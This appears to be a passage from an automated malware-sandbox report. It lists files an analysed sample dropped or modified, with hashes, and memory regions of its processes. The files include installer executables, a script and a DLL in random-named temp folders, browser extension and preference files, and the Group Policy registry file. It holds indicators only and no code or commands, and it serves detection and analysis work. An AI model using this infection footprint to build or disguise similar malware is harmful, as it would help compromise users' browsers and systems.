                                                                                                                          15a9cb11a6fd73d6ea2113bf8636cac0e1508775ddf0e7c85127f9cde8c4a534

                                                                                                                          SHA512

                                                                                                                          66016ed6db5c9fbfbb0a7b90d15fc2e1d2776b5bc5d43332cc703106f1bd2cf55d0467cf3507352a29904c5a0e2b66894ce41cdfef48ab71e4ac0a183dd119d1

                                                                                                                        • C:\Program Files (x86)\XTIErcVviYlSEsscsXR\zShRMUa.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          0eeae4be16eac5421d21a89b5b635619

                                                                                                                          SHA1

                                                                                                                          cd49af40fcb4313aaef10c7dfc599e3b5f50c7f3

                                                                                                                          SHA256

                                                                                                                          696e487e2bcdb3d80b0dc2cc36d80daadf8ccadf5c3d69f6157d7cf6e556d52c

                                                                                                                          SHA512

                                                                                                                          d8312c5b1b52e5fe0757caa24f5b61414637190b2b35cac0726d09e69e2b22806d01e408f83ce42623e4b6059973681f14402d2988e2b8bb37fe40ac15c0e30d

                                                                                                                        • C:\Program Files (x86)\enDWjyqEZhNU2\JzDEUYo.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          792cac7065930d873a6e47f7d4eb6f19

                                                                                                                          SHA1

                                                                                                                          fd853cb289f966ffba1ecd6b8e82d4efc4bbffc8

                                                                                                                          SHA256

                                                                                                                          d5ebf01dcab368fc7530f8451f97853b73283b1a5b54c198b81b2d05a892c63c

                                                                                                                          SHA512

                                                                                                                          1f7a1a1236c5c1f0b6695c3823fb3ab553fc46a0a522feceabf2050273d8d9f9baa5983600cee1aafd5f50de8fd7737251ad1610d73e14009c190ed0a1c53ea0

                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                          MD5

                                                                                                                          af3147576cf04b11602c42690741c638

                                                                                                                          SHA1

                                                                                                                          5a58a792d47b0813dd6e396ca21a7978bc63708f

                                                                                                                          SHA256

                                                                                                                          65d15a9cf361e65d1c8d0ddaab1fbf9517825c4b553550cf6c6774cf381f6b68

                                                                                                                          SHA512

                                                                                                                          34cbf674c9ef5d3496a7e64f48dd5b07efb69fc339dce37b2777928c103577e02ee8a0f44b049248263c9ae5c916851867b9bd629338736e7c20843cb0524014

                                                                                                                        • C:\ProgramData\qDoHUGiKOnuwyvVB\Vdyseue.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          f77a7207a7bc57f8db8c3843d8b404e5

                                                                                                                          SHA1

                                                                                                                          5d11d668ac1ba143d3909a7a5c45d299e222e71e

                                                                                                                          SHA256

                                                                                                                          6a088491ab33783d7a94b0e965aebef16cf6123eb2e755fec8ba7a5e33c64b82

                                                                                                                          SHA512

                                                                                                                          7aea66271bc421af80da5ff01a63e2b2374daf9aeba4fbfaf9172007306df5bbbf88b9ff038c37d78484d50c0217b0c1587de88d44891e21f9024e93884363be

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                          Filesize

                                                                                                                          187B

                                                                                                                          MD5

                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                          SHA1

                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                          SHA256

                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                          SHA512

                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                          Filesize

                                                                                                                          136B

                                                                                                                          MD5

                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                          SHA1

                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                          SHA256

                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                          SHA512

                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                          Filesize

                                                                                                                          150B

                                                                                                                          MD5

                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                          SHA1

                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                          SHA256

                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                          SHA512

                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                          Filesize

                                                                                                                          10KB

                                                                                                                          MD5

                                                                                                                          85c07b8f32fa309a4ee44161922e6035

                                                                                                                          SHA1

                                                                                                                          6a8f020407a940f76a0eb4870f986ebb9c7bf145

                                                                                                                          SHA256

                                                                                                                          da2009ea6c8ed18d6389102a624d6b3dee2e0301f41a616843eb4329fd6da6b7

                                                                                                                          SHA512

                                                                                                                          68df948596a434c75eed85d895a9d344885e46fa83899fc4ba0c58f622e62b36f06e5a6b6aa0fe0410f960ebe48c49297285e12a2692f2f6e5e7dd4675568b00

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                          Filesize

                                                                                                                          7KB

                                                                                                                          MD5

                                                                                                                          c480a0dc1925b22090590f8998219a86

                                                                                                                          SHA1

                                                                                                                          3d5a2fdb902531d6b9d8149180c7c8a021815fdc

                                                                                                                          SHA256

                                                                                                                          55fd25f282212cd4f74a95ec5dc25e674b44184c87289961811ccb8b966606d6

                                                                                                                          SHA512

                                                                                                                          00f7c51e601ade2bf3fc2e0d1a1284b534b9b2f757d5a46f52655687c92e876b7e2c04030e56822c5382c365a10413abe40d92bb93c2854a1d41ee81e5c72320

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                          Filesize

                                                                                                                          7KB

                                                                                                                          MD5

                                                                                                                          70eb7f80e4109d0320600599eba506b7

                                                                                                                          SHA1

                                                                                                                          19feafbef61e4892044902e3d2abbec72cbee91f

                                                                                                                          SHA256

                                                                                                                          e0a2c1570bbf9ca0afba21cbc22c5c8c85c945485e6180086ee3b2ed2bbdf8d2

                                                                                                                          SHA512

                                                                                                                          1e61b341379db83ac35e8527ed6a523179e87437ad689591b7337a229fda464cd73c64186588d228327a4d0b83a856050fd8b2599f0cf6d42c42cf236b9b1728

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                          Filesize

                                                                                                                          7KB

                                                                                                                          MD5

                                                                                                                          eeb349f9572701e9d25b0f714c10cdd5

                                                                                                                          SHA1

                                                                                                                          c0600bc1f26b492b4db00fbf221a1aceb56b8a04

                                                                                                                          SHA256

                                                                                                                          8446dcffc04a62e61eb0c879f5e786eeefd455e1e4a3aeca6ceb4aeaae1fc1e9

                                                                                                                          SHA512

                                                                                                                          ed931a0e1525f8d8063d8d107a94a748e9e05de33c01b72067990519f1162978c9783c3bb1be8c5876fce5ea602e2ce445265c39a6ca644d01140b00ef797444

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x07tfuqf.default-release\prefs.js

                                                                                                                          Filesize

                                                                                                                          7KB

                                                                                                                          MD5

                                                                                                                          6531d47dbac09a512ad2c9489e06b16d

                                                                                                                          SHA1

                                                                                                                          0fdbae9ce58964f77a6a484c80463d443eb84835

                                                                                                                          SHA256

                                                                                                                          7c9d9a4e8eaec4c5bd5ecfcfe7056f5ceffe1c685c654a9b7747703c8b42e60d

                                                                                                                          SHA512

                                                                                                                          bac7a0e703f7ff8e3940dfb24daee3b430e432db4c0cb275d3a4a9db55d0494fae7e2c0dc821a05bd96317afe528b10b3c0f4cb7b4d9b473f3fa36c24b23116d

                                                                                                                        • C:\Windows\Temp\VemQCkOhwRjHyFqD\SWwlWNwS\rYxvEzPoWFmicGXQ.wsf

                                                                                                                          Filesize

                                                                                                                          9KB

                                                                                                                          MD5

                                                                                                                          f2ddbb94853fc2eb46c80625553c9636

                                                                                                                          SHA1

                                                                                                                          957bab72111d912bf82decf682d24a6ce791a77e

                                                                                                                          SHA256

                                                                                                                          f35973a90415ce13d8db6c007f7829dc1fbc280c5ffb93433d68fd72e2f557f4

                                                                                                                          SHA512

                                                                                                                          256786301f2c8e4785fce8d4ca256d6f42c6c8441221da27b46106e1c079e2e3a156474a7b3a0d45583230622e5a5356fe3c2231f4e1ce16d764135955fc6e62

                                                                                                                        • C:\Windows\Temp\VemQCkOhwRjHyFqD\rYWYfoQJ\xfTsuCE.dll

                                                                                                                          Filesize

                                                                                                                          6.4MB

                                                                                                                          MD5

                                                                                                                          036ff06d77a51bfb4d5b0368c1c96760

                                                                                                                          SHA1

                                                                                                                          82f349bf706dc4be88b9ff67e67017cc03a11581

                                                                                                                          SHA256

                                                                                                                          1c124bea82a19344a28de791cdc5ce0ecbe8553c947c91e6c75e9aa52cc1eb7c

                                                                                                                          SHA512

                                                                                                                          5c21aecf14e3384b256a13388e45dbce359dd9cdab6bf564befb3f08fd217ffb78b85235997528763742acef96bdf727f8a207877cc95a531dd73e91495c8efb

                                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                          Filesize

                                                                                                                          6KB

                                                                                                                          MD5

                                                                                                                          d34dd5ac4d5069bbcb9fbfb23c2ea07b

                                                                                                                          SHA1

                                                                                                                          6ce50f82885f82271a403e9077d48b5a23b17921

                                                                                                                          SHA256

                                                                                                                          066c916436530d917f7e62828567e2d00fcdf53e5a1203ae3003bbe62a169969

                                                                                                                          SHA512

                                                                                                                          fda0b8675275bfbd3e6184eaf6df00c663181b32eab0472180bb935b8f72277e0a3665a5f2260f77d11fc16b3b006d081ab97ad027f9614834b10d9ebd9495bb

                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS3A90.tmp\Install.exe

                                                                                                                          Filesize

                                                                                                                          6.4MB

                                                                                                                          MD5

                                                                                                                          cf04662439e431f95729ce98d75309a1

                                                                                                                          SHA1

                                                                                                                          90cf67ac062aa026b97c8bed03a7214d69c90a2b

                                                                                                                          SHA256

                                                                                                                          458830354d17b340c3e53aaa4ca1ac50d7411d87757bbb822471085557b42b48

                                                                                                                          SHA512

                                                                                                                          37b547ca0cfb314301a01e7e77edf206533cf163f4a58a41762dec9734d69abd2e317a83d8ead7be3192bf86ef8d73613b9fa65f61faf78f2bc886aeef53de11

                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS3DDB.tmp\Install.exe

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                          MD5

                                                                                                                          edd50592ab69b499f7fd1fad1659baa1

                                                                                                                          SHA1

                                                                                                                          882b2eb1a12a1bd2a516d0f3f8500036abd3b25c

                                                                                                                          SHA256

                                                                                                                          92f5569ad1c4d84cc12cb7068c4a2929f1ad0ee8bf7110a672a4d7932ccb67c2

                                                                                                                          SHA512

                                                                                                                          f1a5401e0ed875e96ec6719abab973061953f6058360def9fa38d6fa07f68abdb7c96c88858d1b8200553a1e930d933fd27bc8c00d8ec6cba18b9bbecf08038e

                                                                                                                        • memory/828-324-0x0000000001340000-0x000000000191D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/1092-16-0x0000000002360000-0x0000000002A14000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/1740-89-0x0000000000D50000-0x0000000001404000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/1740-91-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/1740-103-0x0000000001F60000-0x0000000001FE5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          532KB

                                                                                                                        • memory/1740-137-0x0000000002110000-0x0000000002175000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          404KB

                                                                                                                        • memory/1740-365-0x0000000000D50000-0x0000000001404000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/1740-338-0x0000000002E90000-0x0000000002F67000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          860KB

                                                                                                                        • memory/1740-328-0x0000000002CF0000-0x0000000002D76000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          536KB

                                                                                                                        • memory/1760-57-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1760-56-0x000000001B730000-0x000000001BA12000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.9MB

                                                                                                                        • memory/1984-81-0x000000001B690000-0x000000001B972000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.9MB

                                                                                                                        • memory/2344-46-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/2344-90-0x0000000000A30000-0x00000000010E4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2344-44-0x0000000000A30000-0x00000000010E4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2344-69-0x0000000000A30000-0x00000000010E4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2456-41-0x00000000012C0000-0x0000000001974000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2456-29-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/2456-23-0x00000000012C0000-0x0000000001974000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2456-24-0x0000000000920000-0x0000000000FD4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2456-25-0x0000000000920000-0x0000000000FD4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2456-26-0x0000000000920000-0x0000000000FD4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/2836-67-0x000000001B750000-0x000000001BA32000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.9MB

                                                                                                                        • memory/2836-68-0x0000000001D80000-0x0000000001D88000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB